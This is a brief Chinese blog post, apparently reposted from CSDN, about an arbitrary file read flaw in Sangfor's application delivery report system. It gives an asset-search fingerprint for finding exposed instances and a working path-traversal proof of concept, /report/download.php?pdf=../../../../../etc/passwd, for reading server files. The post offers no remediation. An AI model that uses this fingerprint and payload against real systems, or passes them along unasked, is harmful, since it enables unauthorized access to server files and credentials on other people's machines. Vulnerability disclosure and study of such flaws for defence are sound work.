深信服应用交付报表任意文件读取漏洞

1.深信服应用交付报表任意文件读取漏洞

深信服应用交付报表系统 download.php文件存在任意文件读取漏洞，攻击者通过漏洞可以下载服务器任意文件。

深信服应用交付报表系统

app=“SANGFOR-应用交付报表系统”

在这里插入图片描述

这里通过抓包进行文件读取，当然也可以在页面中直接进行获取。

POC：/report/download.php?pdf=../../../../../etc/passwd

在这里插入图片描述

标签：安全 web安全网络安全

本文转载自: https://blog.csdn.net/weixin_44268918/article/details/128964755
版权归原作者 剁椒鱼头没剁椒 所有，如有侵权，请联系我们删除。